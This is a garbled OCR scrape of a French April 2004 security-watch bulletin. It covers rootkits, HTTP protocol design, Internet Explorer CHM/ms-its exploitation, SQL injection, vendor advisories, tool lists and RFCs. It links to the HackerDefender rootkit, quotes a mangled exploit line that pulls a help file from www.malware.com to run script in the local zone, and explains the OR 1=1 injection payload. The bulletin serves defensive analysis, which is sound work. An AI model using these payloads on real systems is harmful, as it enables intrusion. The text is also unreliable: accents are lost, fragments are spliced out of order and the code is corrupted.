132. rootkits Produit Process guard http rootkit host sk release hxdef100 zip RootKit HackerDefender V1 0 http rootkit host sk knowhow hidingru txt Manipulation des appels syst me Win32 http rootkit host sk knowhow rutkowski pdf D tection et de protection sous WI N32 blackhat TECHNIQUES Di GRESSI ONS AUTOUR DU PROTOCOLE HTTP Description L une des lois de la thermodynamique nous apprend que l ordre n est pas dans la nature des choses et que tout tend vers le d sordre t t ou tard Ce principe fondamental peut se d cliner volont les puristes nous pardonneront et s appliquer notre domaine d int r t lequel tend naturellement vers une complexit croissante elle m me g n ratrice de d sorganisation Cr er des syst mes inter op rables et performants s inscrivant dans un mod le simple et coh rent tient d sormais de la gageure l nergie d penser pour maintenir la coh rence des d veloppements vis vis d un simple cadre structurant devenant bien trop importante pour tre rentabilis e court terme Combien de temps devrons nous encore devoir faire les frais de bricolages de pi tre qualit autour du protocole SMTP pour rendre celui ci fiable et performant quand nous disposions il y a maintenant plus de 15 ans d un protocole de messagerie digne de ce nom Peut on consid rer pouvoir continuer longtemps empiler des protocoles de communication les uns sur les autres au seul titre de l co
133. rotocolaires par le destinataire Un paquet IP tait donc cens tre transmis dans le plus strict respect de la sp cification 11 est tr s rapidement apparu que cette pile n assurait aucun contr le d aucune sorte expliquant ainsi ses remarquables performances Le traitement de donn es non conformes r sultant du raccordement des syst mes l utilisant sur des r seaux ouverts dont l Internet a conduit aux d nis de service que l on sait e Validation de l impl mentation du protocole L objectif est ici de v rifier que le protocole a t impl ment conform ment aux sp cifications Cette validation prend souvent la forme d une s rie de tests visant analyser les r actions de l impl mentation cible face des sollicitations conformes aux sp cifications et restant donc dans le domaine de validit d fini pour les l ments protocolaires Id alement les tests doivent couvrir deux domaines la conformit de l automate d tat et le respect des structures des l ments protocolaires On pourra citer titre d exemple le cas du traitement des trames Ethernet par certains pilotes qui ne remplissent pas la zone non utilis e d une trame par la valeur contrairement ce qui est sp cifi par le RFC 1042 Les trames transportant des donn es d une longueur inf rieure la taille maximale 46 octets pourraient donc contenir des donn es r manentes provenant d une trame transmise ant rieurement e Validation du fonctionne
134. s cat gories correspondant aux risques Faible et Moyen ne donnent lieu aucune interpr tation celles de la cat gorie Elev peuvent poser un probl me On notera en effet une confusion des genres pouvant porter cons quence class es dans le m me registre les extensions cpl reg et msc identifient pourtant des formats fondamentalement diff rents Ainsi l extension cpl d signe un ex cutable WI N32 de format proche d une librairie dynamique destin tre activ par le biais du panneau de contr le alors que l extension reg identifie un fichier de texte contenant une s rie d instructions destin es tre interpr t e par l diteur de registre les extensions lib et obj d signent toutes deux des fichiers contenant un code binaire non directement exploitable car destin tre statiquement li une application durant la phase dite d dition de lien Le risque associ ce format est ce jour peu lev du moins en environnement WIN32 e regroupement des extensions cgi et vbs peut apparaitre peu judicieux car d signant pour la premi re un fichier contenant un script crit dans un quelconque langage ex cut sur un serveur WEB et pour l autre un fichier contenant des instructions en Visual Basic Script g n ralement ex cut es sur le poste client De notre point de vue il eut t pertinent d organiser cette classification en tenant compte du contexte
135. s extr mes d attaque Les auteurs du document arrivent ainsi la conclusion qu une clef asym trique RSA ou DH d une taille de 2100 bits aura une robustesse quivalente une clef de 112 bits utilis e dans un Triple DES en regard d une attaque effectu e avec un mat riel sp cialis Dans la m me logique d analyse une clef asym trique 1200 bits pourra tre utilis e conjointement avec une clef sym trique de 80 bits pour prot ger une information sur une dur e r duite d un an Nous laisserons au lecteur le soin de d couvrir par le d tail le raisonnement associ ces r sultats dont certains sont pour le moins inattendus La table des mati res de ce RFC de 23 pages est reproduite ci dessous l Model of Protecting Symmetric Keys with Public Keys 1 1 The key exchange algorithms 2 Determining the Effort to Factor 2 1 Choosing parameters for the equation 2 2 Choosing k from empirical reports 2 3 Pollard s rho method 2 4 Limits of large memory and many machines 2 5 Special purpose machines 3 Compute Time for the Algorithms 3 1 Diffie Hellman Key Exchange 3 1 1 Diffie Hellman with elliptic curve groups 3 2 RSA encryption and decryption 3 3 Real world examples 4 Equivalences of Key Sizes 4 1 Key equivalence against special purpose brute force hardware 4 2 Key equivalence against conventional CPU brute force attack 4 3 A One Year Attack 80 bits of strength 4 4 Key equivalence for other ciphers 4 5 Hash func
136. s que l IDN Internationalized Domain Names ont bien vu le jour mais leur impl mentation demeure pour le moins complexe Le lecteur pourra s en convaincre en parcourant le RFC3743 portant sur l enregistrement et l administration des noms de domaine r f renc s en Chinois Cor en et Japonais Pour conclure Le ler volet du SMSI n a pas eu l cho escompt aupr s des m dias L importance des enjeux pr sent s lors du sommet aura ainsi peut tre chapp au commun des internautes Plusieurs r unions ont n anmoins t organis es en cho au sommet de Gen ve afin de d battre ou de pr ciser les enjeux de la gouvernance un public largi Nous avons assist l une d entre elles organis e par l association G9 dans les locaux de l cole des Mines de Paris Force est de constater que l espace de r flexion offert aura servi de tribune essentiellement politique aux diff rents intervenants ne laissant que trop peu de place aux repr sentants de la soci t civile En attendant la soci t num rique est en route plus d un million deux cent mille internautes citoyens fran ais ont d clar leur revenu sur Internet Compl ment d information http www gouvernance internet com fr information organismes html http www eurocio org domainname documents 2003 presentations presentations at4 louis pouzin ppt fr pdf http www afnic fr actu nouvelles nnmmage NN20021015 http www iris sgdg org les iris Ibi Ibi 110402 html V
137. shtml Reprise des avis Red Hat sur le noyau Linux Le CIAC a repris sous la r f rence O 126 les avis Red Hat RHSA 2004 105 RHSA 2004 106 RHSA 2004 166 et RHSA 2004 183 concernant de multiples vuln rabilit s dans le noyau Linux http www ciac org ciac bulletins o 126 shtml CAN 2004 0177 CAN 2004 0109 CAN 2004 0077 CAN 2004 0010 2004 0003 CAN 2002 1574 Reprise de l avis Ethereal enpa sa 00013 Le CIAC a repris sous la r f rence O 105 l avis Ethereal enpa sa 00013 propos de multiples vuln rabilit s dans l outil Ethereal pouvant conduire un d ni de service et l ex cution de code arbitraire 2004 0176 2004 0367 2004 0365 Reprise de l avis Debian DSA 495 1 Le CIAC a repris sous la r f rence O 127 l avis Debian DSA 495 1 discutant de multiples vuln rabilit s dans le noyau Linux pour les architectures ARM http www ciac org ciac bulletins 0o 127 shtml CAN 2003 0127 CAN 2004 0003 CAN 2004 0010 CAN 2004 0109 CAN 2004 0177 CAN 2004 0178 Veille Technologique S curit N 69 Page 47 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Reprise de l avis Red Hat RHSA 2004 112 09 Le CIAC a repris sous la r f rence O 106 l avis Red Hat RHSA 2004 112 09 discutant de multiples vuln rabilit s dans le navigateur Mozilla entrainant l exposition d informations sensibles un d ni de servi
138. simple rencontr par les chercheurs du CERN ayant compulser longueur de temps rapports et articles de recherche par le biais d une interface console propri taire adapt e aux terminaux de saisie asynchrones Issu d un d veloppement interne le cahier des charges r pondait un besoin simple et pr cis imposant notamment un protocole d change HTTP et un langage de pr sentation HTML ais s d impl mentation sur les syst mes de l poque Ces deux contraintes sont probablement l origine du succ s foudroyant qu a rencontr ce protocole En l absence de toute vell it initiale de normalisation et le succ s aidant de plus en plus de fonctionnalit s ont t greff es par les concepteurs des interfaces de navigation conduisant rapidement devoir faire r glementer le devenir du protocole et du langage Le consortium naissait ainsi en 1994 sous l impulsion de l inventeur de ce que l on allait d signer par le vocable WEB Con u l origine comme un simple protocole de pr sentation bas sur un change de type question r ponse HTTP est insidieusement devenu un protocole de transport de donn es plus ou moins structur es N a t il pas t d montr plusieurs reprises qu il tait possible d encapsuler le protocole r seau IP dans le protocole HTTP avec certes des performances d grad es mais avec aussi l ind niable avantage de pouvoir ainsi cr er en toute libert un tunnel travers des quipeme
139. soft a r vis les bulletins MS00 082 MS01 041 MS02 011 et MS03 046 afin d annoncer la disponibilit d une mise jour des correctifs pour Microsoft Exchange Server 5 0 Exploitation de la faille CHM sur Internet Explorer Une faille connue dans Internet Explorer permet d ex cuter un programme arbitraire dans la zone locale Une variante de l exploitation de cette vuln rabilit est possible via le traitement du protocole ms its Une parade non officielle consiste supprimer la gestion du protocole ms its its et mk dans la base de registre http www securityfocus com archive 1 354447 http www securityfocus com bid 9658 Probl me du niveau de chiffrement d Internet Explorer Un message dans la liste de diffusion Full Disclosure nous informe qu il existe un probl me dans le niveau de chiffrement d Internet Explorer apr s application du correctif MS04 011 Ce probl me impacterait la version 6 0 3790 0 d Internet Explorer sur plate forme Microsoft Windows 2003 et entra nerait une impossibilit de connexion sur les sites utilisant SSL II n y a pas de nouveau correctif disponible l heure actuelle Dans le cas d une navigation sur des sites requ rant une connexion s curis e nous conseillons l utilisation de navigateurs alternatifs afin d viter de d sinstaller le correctif MS04 011 http lists netsys com pipermail full disclosure 2004 April 020246 html 7 gm Parade pour la vuln rabilit dans M
140. t InfoTech Storage ou ITS Ce format est utilis par les fichiers d aide en ligne dits CHM ou Compiled HTML Help Successeur du vieux format HLP r sultant de la compilation de fichiers d aide aux formats RTF et de commandes sp cifiques le format CHM autorise la cr ation d une structure documentaire complexe partir de documents r dig s au format HTML http www site com Meinen anni Zone Internet 4 Ci p c o c o Ni handler S gum zone locale Comportement risque Veille Technologique S curit N 69 Page 59 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Tout comme son pr d cesseur ce format PERRET autorise l activation de scripts et ES programmes externes ou directement int gr s Hide Back Forward Options web Help dans le fichier d aide L emploi du langage HTML autorise de fait Contents Indes Search IPSec security negotiation l utilisation de toutes les commandes du 2 ne E LE vanced opics contract between the two computers must langage dont en particulier les balises E How IPS amp c works be established This contract is called a SCRIPT OBJECT qui seront interpr t es security association SA In an SA both p J d q l aid Le SEU pri
141. t transmise la redirection vers les gestionnaires ad hoc tant sous le contr le du programme g n ralement le navigateur Le sch ma Bii e o e n n n d Le sch ma mhtml autorise le r f rencement d une page HTML contenue dans un fichier composite utilisant le format dit Mime HTML La syntaxe tmhtml Mon Fichier MHML Mon Fichier HTML autorise ainsi l extraction s lective du fichier Mon Fichier HTML contenu dans le fichier Fichier MHML La logique de traitement des erreurs par le gestionnaire tmhtml conduit celui ci tenter de traiter directement le fichier html si aucune r f rence correspondante n est trouv e dans le fichier mhtml ou si celui ci est absent La s quence suivante conduira donc le navigateur traiter le fichier local fichier local html dans la zone Internet si le fichier fichier inexistant mhtml ne peut tre acc d sur le site www monsite com mhtml http www monsite com fichier inexistant mhtml fichier local html On notera que les caract ristiques de ce gestionnaire autorisent la mise en place de multiples techniques d exploitation mises en vidence d s Juin 2003 par Liu Die Yu Particulierement remarquable par l absence de toute documentation le concernant l exception de quelques articles dans le paquetage de d veloppement le protocole ms its autorise un acc s distant tout ou partie des donn es structur es archiv es dans des fichiers utilisant le forma
142. te de pr server la bande passante en conservant l interop rabilit avec les impl mentations TCP qui n auraient pas fait l objet d une mise jour ftp ftp nordu net internet drafts draft ietf tcpm tcpsecure 00 txt Proposition d am nagement du protocole http www uniras gov uk vuls 2004 236929 index htm Analyse d taill de l alerte TCP http www osvdb org reference Slippingl nTheWindow v1 0 doc Etude de P Watson http www osvdb org reference Slippingl nTheWindow v1 0 ppt Pr sentation CanSecWest 2004 DRAFT IETF I NCH I MPLEMENT La proposition de standard intitul e Incident Object Description and Exchange Format Data Model and XML vise d finir les bases d un mod le de description g n rique des incidents de s curit commun l ensemble des diff rents centres d alerte ou CSI RT Rapports N 46 Mai 2002 et N 53 D cembre 2002 D nomm IODEF Incident Object Description amp Exchange Format et issu des travaux des groupes IDWG Intrusion Detection et ITDWG Incident Taxonomy and Description Working Group de l IETF ce mod le a subi de nombreuses volutions depuis la sp cification initiale Synth tis es par le diagramme de classe meer TREE ci contre ces volutions ont h las conduit complexifier quelque peu un mod le de donn es initialement concu pour faciliter la lisibilit comme le pr cisait le RFC3067 ODEF is a human oriented format for Incident desc
143. tement tre appliqu s Forte 13 04 1j 7 0 6 1j Correctif existant Fichier config xml Stockage en clair du mot de passe de la base de donn e BEAO04 53 00 i isori ificati j El vation de Le mot de passe de l utilisateur ayant servi d marrer le serveur est ais ment accessible Forte 13 04 BEA WebLogic Server et Express 8 1 SP2 et inf rieurs 7 0 SP4 et inf rieurs Correctif existant Non disponible Exposition d information BEA04 55 00 http dev2dev bea com resourcelibrary advisoriesnotifications BEAO4 55 00 jsp Forte 20 04 WebLogic Server et Express version 8 1 5 1 et inf rieure version 7 0 SPA et inf rieure BEA04 56 00 http dev2dev bea com resourcelibrary advisoriesnotifications BEA04 56 00 jsp D ni de service des applications dans WebLogic Une vuln rabilit dans la gestion des EJBs peut conduire un d ni de service de certaines applications Forte 20 04 WebLogic Server et Express version 8 1 SP 2 et inf rieur 7 0 SP 4 et inf rieur 6 1 SP 6 et inf rieur Correctif existant Non disponible Mauvaise gestion des EJ Bs BEA04 57 00 http dev2dev bea com resourcelibrary advisoriesnotifications BEA04 57 00 jsp osition d informations sensibles dans WebLogic Une erreur de conception dans les scripts de configuration peut entra ner l exposition d informations sensibles Forte 20 04 WebLogic Server et Express 8 1 SP 2 et inf rieur Correctif existant config sh et config c
144. temps r el sur ces sites le d fi propos sur le formulaire de cr ation d un compte I se trouvera toujours un visiteur pour r soudre le d fi judicieusement plac sur la plage d accueil Le reste n est qu une affaire de programmation le r sultat du d fi doit tre rapidement retransmis dans le formulaire de cr ation du compte sea people man plant ocean sun talking water porch Compl ment d information http www captcha net Projet Captcha http www cs berkeley edu mori gimpy gimpy html Attaque du proc d http www espgame org dentification et nommage des images http www users cs umn edu sampra research ReverseTuringTest PDF Etude des principes des d fis du type CAPTCHA COMPROMI SSI ON ELECTROMAGNETI QUE Description O CAMBRID OF Fin 2003 un chercheur du laboratoire de recherche informatique de l universit de Cambridge CAMBRIDGE travaillant dans l quipe de Ross Anderson publiait un fabuleux document pourtant pass inaper u Computer Laboratory en dehors de quelques sp cialistes du domaine de l interception des signaux compromettants Dans un rapport de plus de 166 pages intitul Compromising emanations eavesdropping risks of computer displays Martin Kuhn nous d voile les nouveaux r sultats des travaux qu il avait engag s d s 1998 et approfondis en 2002 dans le domaine de l interception des signaux compromettants manant des moniteurs vid o L auteur un
145. termin e avant d avoir lu la balise terminant ce tableau Libert dans la construction des URL qui peuvent d sormais r f rencer tout et n importe quoi au bon vouloir de l diteur du navigateur dont on ne sait plus quels sont les traitements qui sont engag s avant m me d initialiser la moindre connexion avec la ressource cible Le concept d uniformisation de l acc s aux ressources est certainement tr s int ressant sous r serve de pas tomber dans l exc s consistant cr er ex nihilo de nouvelles ressources en arguant qu un moyen d acc s universel est disponible Quelques exemples Deux vuln rabilit s ont t mises en vidence derni rement qui illustrent parfaitement nos propos et plus pr cis ment les risques encourus autoriser un langage laxiste et la cr ation de ressources non document es Une analyse d taill e de ces vuln rabilit s va nous permettre de ramener notre propos quelquefois pol mique sur un terrain plus solide celui de la technique Structuration Donn es Veille Technologique S curit N 69 Page 57 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 Le premier cas concerne une manipulation simple mais efficace permettant de berner l utilisateur d un navigateur en lui faisant croire que le lien affich le conduira bien sur le site associ L astuce employ e est tout fait licite Ell
146. tilisateur distant provoquer un d ni de service ou obtenir un acc s non autoris http ciac Ilnl gov ciac bulletins o 120 shtml Reprise de l avis Debian DSA 479 1 Le CIAC a repris sous la r f rence O 121 les avis Debian DSA 479 1 DSA 482 1 discutant de multiples vuln rabilit s dans le noyau Linux http ciac IInl gov ciac bulletins o 121 shtml CAN 2004 0003 CAN 2004 0010 CAN 2004 0109 CAN 2004 0177 CAN 2004 0178 Reprise de l avis Red Hat RHSA 2004 160 05 Le CIAC a repris sous la r f rence O 122 l avis Red Hat RHSA 2004 160 05 propos d une vuln rabilit affectant les sources de la biblioth que neon int gr e dans Open Office http ciac Ilnl gov ciac bulletins o 122 shtml CAN 2004 0179 Reprise de l avis Debian DSA 483 1 Le CIAC a repris sous la r f rence O 123 l avis Debian DSA 483 1 concernant deux vuln rabilit s dans la base de donn es MySQL rise de l avis Cisco sur les impl mentations TCP Le CIAC a repris sous la r f rence O 124 les avis Cisco 50960 et 50961 au sujet des vuln rabilit s de d ni de service dans les produits Cisco impl mentant une pile TCP http www ciac org ciac bulletins o 124 shtml CAN 2004 0230 Reprise de l avis Cisco 50980 Le CIAC a publi sous la r f rence O 125 l avis Cisco 50980 au sujet d une vuln rabilit dans le traitement des requ tes SNMP pouvant conduire un d ni de service http www ciac org ciac bulletins 0o 125
147. tion de l Internet Ces propositions seront pr sent es lors du 2i me volet du sommet organis en 2005 Tunis Gouverner l Internet Appr hender les implications transverses de l Internet dans nos soci t s afin de proposer un mod le permettant d encadrer et de r guler son d veloppement tout en satisfaisant aux int r ts de tous n est pas chose ais e Pour paraphraser Kofi Annan lors de son discours d ouverture du Forum mondial sur la gouvernance de l Internet une contribution aux consultations mondiales du SMSI le 25 mars dernier New York la d finition de la notion de N gouvernance de l Internet constitue elle seule un sujet de d bat Certains aspects de l Internet r pondent une logique d organisation hi rarchique toujours probl matique dans le cadre d un syst me international Tel est le cas du syst me de nommage dit DNS qui requiert l utilisation d un serveur central vital pour le bon fonctionnement et le d veloppement durable du r seau Contr ler et g rer ce serveur revient contr ler l Internet et la strat gie de son volution D autres aspects telle l attribution des adresses IP Version 4 sont critiques compte tenu des probl mes de p nurie des plages d adresses publiques encore disponibles le d ploiement g n ralis de la Version 6 qui doit corriger ce probl me se faisant attendre Auparavant administr e par un organisme public am ricain l IANA la gestion du syst me de nom et des
148. tions Tous droits r serv s Page 7 64 Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 pee e Protocole SIP Session Initialisation Protocol e Protocole TLS Transport Layer Secure Protocol Ces outils s adressent aussi bien au prescripteur d sireux de qualifier les diff rentes solutions qui lui sont propos es qu l diteur soucieux de ne pas mettre sur le march un produit insuffisamment test On notera pour conclure qu aucune des approches pr sent es ne permet de solutionner correctement un probl me de plus souvent rencontr celui du d tournement des fonctionnalit s originales du protocole Compl ment d information http www codenomicon com products html Plates formes de test http www ee oulu fi research ouspg protos Projet PROTOS LES TECHNOLOGIES CLASSI FI CATI ON CAPTCHA UNE APPLICATI ON DU TEST DE TURI NG Description The De plus en plus d outils sont mis sur le march qui permettent d automatiser la recherche CAPTCHA d informations vari es sur les sites WEB de l Internet voire de t l charger l int gralit de ceux ci J quand bien m me ceux ci indiqueraient explicitement que leur contenu n est pas destin tre copi s Force est de constater que bien peu de robots respectent les r gles exprim es dans les balises sp cifi es cet usage tel que l attribut Robots de la balise Meta Diff rentes m thodes ont a
149. tions for deriving symmetric keys from public key algorithms 4 6 Importance of randomness 5 Conclusion 5 1 TWIRL Correction 6 Security Considerations 7 References 7 1 Informational References 8 Authors Addresses 9 Full Copyright Statement ftp ftp isi edu in notes rfc3766 txt Veille Technologique S curit N 69 Page 28 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 LES DRAFTS DRAFT IETF TCPM TCPSECURE Le 20 avril l organisme d alerte Anglais UNI RAS publiait une alerte concernant une vuln rabilit dans le protocole TCP I P alerte rapidement reprise par tous les grands organismes d alerte Le m me jour et en coordination avec ces organismes d alertes l IETF diffusait une proposition de norme intitul e Transmission Control Protocol security considerations expliquant les tenants et aboutissants de cette attaque ainsi que les modifications devant tre apport es au protocole TCP I P pour y rem dier La vuln rabilit dont il est question r side dans les conditions de traitement des paquets utilisant les drapeaux RST et SYN Le drapeau SYN est employ pour ouvrir une connexion le drapeau RST ayant pour r le de terminer une connexion TCP ou de rejeter abruptement une demande d ouverture de connexion Encore faut il qu un certain nombre de conditions soient respect es pour garantir le bon fonction
150. ttp www apple com support downloads securityupdate 2004 04 05 10 3 3 html CAN 2004 0079 CAN 2004 0110 CAN 2004 0112 CAN 2004 0382 CAN 2004 0383 V Vuln rabilit de SI P sur Converged Communication Server Avaya a annonc que le produit Avaya Converged Communication Server est vuln rable dans l impl mentation du protocole SIP Session Initiation Protocol L exploitation d un d bordement de buffer permet de provoquer un d ni de service ou d ex cuter un code arbitraire sur le serveur vuln rable Un correctif est en attente mais l diteur fournit une parade permettant de limiter l impact de cette vuln rabilit http support avaya com security mm mom 1 f W Ww 1 A as PA Vuln rabilit dans plusieurs produits Blue Coat Blue Coat annonc que plusieurs produits sont vuln rables l attaque par d ni de service dans l impl mentation TCP et notamment les syst mes Blue Coat utilisant une session TCP restant ouverte longtemps Les syst mes affect s sont Blue Coat CA SA 4 x SG 2 x SG 3 x Cependant BGP n est pas support Les versions SGOS 3 1 x et 2 1 x disponibles fin avril 2004 CacheOS CA 4 1 x SG2 ou SG3 et CacheOS SA 4 1 x SG3 corrigeront ces vuln rabilit s http www bluecoat com support knowledge advisory tcp can 2004 0230 html CAN 2004 0230 m Reprise de l avis Microsoft MS04 011 MS04 014 Le CER
151. u filet L approche qui y est d velopp e est particuli rement int ressante car tr s p dagogique et agr able a lire pour un non sp cialiste Plusieurs proc d s tirant parti des sp cificit s de tout ou partie des impl mentations SQL sont par ailleurs tudi s dont certains remarquablement performants 1 Variations autour de l expression passe partout OR 1 1 Ce type d expression est tr s usit car il permet de rendre valide une quelconque expression conditionnelle et par cons quent d activer inconditionnellement la clause associ e Imaginons titre d exemple une requ te retournant le num ro de t l phone de l utilisateur dont le nom et le pr nom auront t fournis en param tres resp p1 et p2 d un formulaire Cette requ te prendra probablement la forme suivante SELECT Phone FROM Users WHERE Nom p1 AND Prenom p2 Notre expert souhaite obtenir tous les num ros de t l phone sans pour autant connaitre un seul des utilisateurs d clar s dans la table Users II pourra pour cela utiliser l expression passe partout OR 1 1 en saisissant dans les champs nom et pr nom du formulaire la cha ne OR 1 1 Sous r serve qu aucun contr le de validit des champs de saisie ne soit effectu la requ te qui sera transmise la base de donn es sera la suivante SELECT Phone FROM Users WHERE Nom 3 AND Prenom Xe SEE Cette requ te valide sur le plan syntaxique n a bien videmment pas la signification att
152. uatre ans t publi ce sujet dans une interview donn e par le fondateur de la soci t Bien que l organisation des cat gories de vuln rabilit s soit contestable car m langeant les genres ce tableau a le m rite de mettre en vidence un fait r el et quotidiennement constat celui de la nette pr dominance des vuln rabilit s applicatives li es des d fauts de conception Le technique dite de l injection SQL a fait l objet de nombreuses publications dont deux articles dans nos rapports de veille N 43 de f vrier 2002 et N 62 de septembre 2003 dont nous reproduisons ci dessous et in extenso les l ments permettant d illustrer la suite de nos propos La probl matique de l injection SQL est inh rente l utilisation de requ tes construites dynamiquement partir d l ments fournis par un tiers anonyme car non identifi en tant qu utilisateur de la base de donn es acc d e via l interface WEB Un exemple d une chaine de liaison habituellement mise en oeuvre dans les infrastructures Votre acc s au cercle carr WEB actuelles est pr sent ci Votre nom vi pi contre Votre code v2 gt p2 Les donn es saisies dans un Valider l acc s formulaire sont transmises en tant que variables d un script li au formulaire Une requ te SQL est construite sur la base des donn es saisies puis transmises au SGBD Le r sultat de la requ te est mis en forme puis pr sent http www le
153. ujours pas t corrig es Le ph nom ne le plus marquant reste tr s certainement celui du manque chronique d informations que celles ci concernent les sp cifications d utilisation des diff rents protocoles ou les techniques d attaques On peut en arriver se demander si les auteurs de ces sc narios d attaque ma trisent r ellement le contexte d utilisation de ces protocoles Auquel cas qui sont ils pour avoir le degr de comp tence n cessaire dans un domaine tr s sp cifique Mais peut tre agissent ils simplement la mani re des alchimistes d antan en testant diff rents assemblages de techniques jusqu trouver l assemblage qui va bien et tenter d expliquer son fonctionnement a posteriori Compl ment d information http www securityfocus com archive 1 358913 2004 03 28 2004 04 03 0 Une synth se des techniques d exploitation http umbrella mx tc Site de Liu Die Yu http www malware com junk de lux html Code de d monstation Malware http www helpware net htmlhelp hh info htm Evolution du format HTML http www w3 org TR uri clarification D finition des sigles URI URL URN et URC SQL TECHNIQUES D INJECTI ON ET ANALYSE DE SIGNATURE Description en 2000 par l un des co fondateurs de la c l bre soci t CheckPoint la soci t iMPERVA 9 PEHVA s est sp cialis e dans le domaine de la s curisation des WEB Anciennement connue sous le nom de WebCoheort cette soci
154. uln rabilit r seau 2 0 10 22 01 04 nttp www nessus org Nikto Jnalysehttpethttps 1 32 17 12 03 nttp www cirt net nikto UPDATES 1 32 CHANGES txXt Nmap X Vuln rabilit r seau 3 50 18 01 04 fhttp www insecure org nmap nmap_download html andora http 02 08 03 http sourceforge net projects trinux Whisker LibWhisker 27 02 03 http www wiretrip net rfp p doc asp id 21 CONFI DENTI ALI T Non Dat ISo OpenPGP Signature Chiffement http www openpgp org GPG Signature Chiffrement 24 12 03 http www gnupg org CONTR LE D ACCES IN So TCP Wrapper Acc s services TCP 7 6 fftp ftp cert org pub tools tcp wrappers Xinetd lnetd am lior 2 3 13 12 04 http synack net xinetd CONTR LE NT GRI T Fonci Ver Date So Tripwire lint grit LINUX 2 3 47 15 08 00 http www tripwire org downloads index php ChkRootKit Compromission UNIX 27 12 03 http www chkrootkit org D TECTI ON D I NTRUSI ON Nom Fonction _ Ver Date Soure _ ttp all net dtk index html ttp ciac IInl gov cstc nid nid html Snort IDS R seau 2 1 3rc1 21 04 04 http www snort org dl Shadow 105 R seau 1 8 30 04 03 fhttp www nswc navy mil ISSEC CID N Fon Dat So Elza Requ tes HTTP __ 1 45 01 04 00 fhttp www stoev org elza project news html FireWalk JjAnalysefiltres
155. uvre ici qu il est int gr dans le fichier d aide NtShared chm Ce n est pas le cas du sch ma alternatif mk et du sous protocole MSITStore qui eux peuvent tre directement activ s par le biais d une URL ayant une forme similaire celle pr sent e ci apr s mk MSITStore C WINNT Help mmc chm sag MMCConcepts2 3 htm Bien que non explicitement document e la syntaxe d appel de ces deux protocoles transpara t sur ces exemples la r f rence du document s lectionn ou topic dans le jargon est transcrite directement apr s le s parateur Ces deux protocoles autorisent en effet la s lection d un document contenu dans un fichier d aide situ sur un syst me distant permettant ainsi l impl mentation d un syst me d aide contextuel distribu Les quelques informations glan es sur Internet principalement sur le remarquable site du Helpware group et confirm es par divers tests montrent que la totalit du fichier chm r f renc est t l charg e dans le cache du navigateur quand bien m me un seul document serait s lectionn Les droits d acc s ce document et plus particuli rement les conditions d ex cution des scripts et autres codes contenus dans celui ci d pendent de la politique de s curit Dans le cas d un acc s effectu via un navigateur ces restrictions sont pilot es par la zone de s curit associ e l origine du document zone Locale pour un fichier local zone
156. x com chm chm files launch htm Une logique de type ceinture et bretelles est ici employ e dans l optique d assurer l invocation de la page launch htm et par cons quent du programme mstasks exe dans la zone locale du navigateur et ce sans que l utilisateur n en soit conscient Le code Junk de Lux Le lecteur souhaitant se rendre compte par lui m me du probl me pos par ces proc d s d attaque pourra se rendre sur la page http www malware com junk de lux html contenant un exemple d activation d un programme sans danger Cette page contient la s quence suivante button onclick 2 document location view source document location href lt button gt oboe data ms its mhtml file C MV oo mhtml http www malware com foo chm foo html type textx servotlet U stylo vvssxbsTity wiceem L activation du bouton conduit visualiser le source de la page html courante par le biais du sch ma view source L diteur notepad exe est utilis cette fin La d compilation du fichier d aide r v le le d tail de l attaque La page foo html est extraite du fichier d aide foo chm Elle contient un script VBS qui est ex cut dans la zone locale puisque le gestionnaire ms its a t induit en erreur par l utilisation de la syntaxe pr sent e pr c demment Ce script d une vingtaine de lignes utilise une technique publi e par Jelmers qui consiste utiliser les fonctionnalit s de l objet
157. y53 txt D bordement d entier dans la fonction emalloc Un d bordement d entier affecte la fonction PHP emalloc Forte 05 04 Correctif existant Fonction emalloc D bordement d entier Sir Mordred http mslabs iwebland com advisories adv 0x0010 php CAN 2003 0166 Forte 14 04 Qualcomm Eudora 6 03 O RI Y T Y Forte 20 04 Real Networks D ni de service dans les serveurs Helix Une vuln rabilit dans les serveurs Helix peut conduire un d ni de service distant Forte 15 04 Real Networks Helix Universal Server 9 0 2 Linux Universal Server 9 0 1 windows Correctif existant Serveur Helix Mauvaise gestion de la requ te HTTP GET iDefense 102 http www idefense com application poi display id 102 amp type vulnerabilities CAN 2004 0389 Acc s non autoris au commutateur SmartEther SS6215S Une vuln rabilit dans les commutateurs SmartEther SS6215S permet d obtenir un acc s non autoris Forte 26 04 Samsung SmartEther 5562155 Interface d administration Mauvaise validation du mot de passe http www securityfocus com archive 1 361448 SYMANTEC D bordement de buffer exploitable distance Un d bordement de buffer exploitable distance affecte le contr le ActiveX Symantec Virus Detection Forte 01 04 Aucun correctif Biblioth que rufsi dll D bordement de buffer Rafel I vgi 55 http theinsider deep ice com texts advisory55
158. zing Domain Names in Applications IDNA ameprep A Stringprep Profile for IDN IRFC3492 draft costello rfc3492bis 02 15 04 Punycode A Bootstring encoding of Unicode for IDNA ROUTING jdraft white pathconsiderations 02 1 16 04 Considerations in Validating the Path in Routing Protocols draft ietf avt rtp midi guidelines 03 16 04 An Implementation Guide for RTP MIDI SIGTRAN Graf bidulock sigtran m2pa test 05 draft ietf sigtran m3ua v02 00 SIMPLE draft elwell sip state update 01 23 04 State update during a SIP dialog draft ranjit sipping conference 01 15 04 Session Initiation Protocol SIP Conferencing SIPP draft camarillo sipping uri list 02 30 03 Providing SIP Application Server with a List of URIs Ad Hoc Conferencing in SIP O draft camarillo sipping adhoc conferencing 00 30 03 Ad Hoc Conferencing in SIP SNMP draft black snmp uri 04 draft perkins snmpv3 overview 00 XMPP draft saintandre xmpp uri 03 draft saintandre jsf isoc 00 draft ietf xmpp im 22 draft ietf xmpp core 23 Veille Technologique S curit N 69 Page 27 64 APOGEE Communications Tous droits r serv s Diffusion restreinte aux clients abonn s aux services VTS RAPPORT et VTS ENTREPRISE Avril 2004 NOS COMMENTAIRES LES RFC RFC 3766 BCP 00086 Determining Strengths For Public Keys Used For Exchanging Symetric Keys Ce standard entre dans la cat gorie des recommandations d usage ou Best Current Practices a pour amb

Download Pdf Manuals

image

Related Search

Related Contents

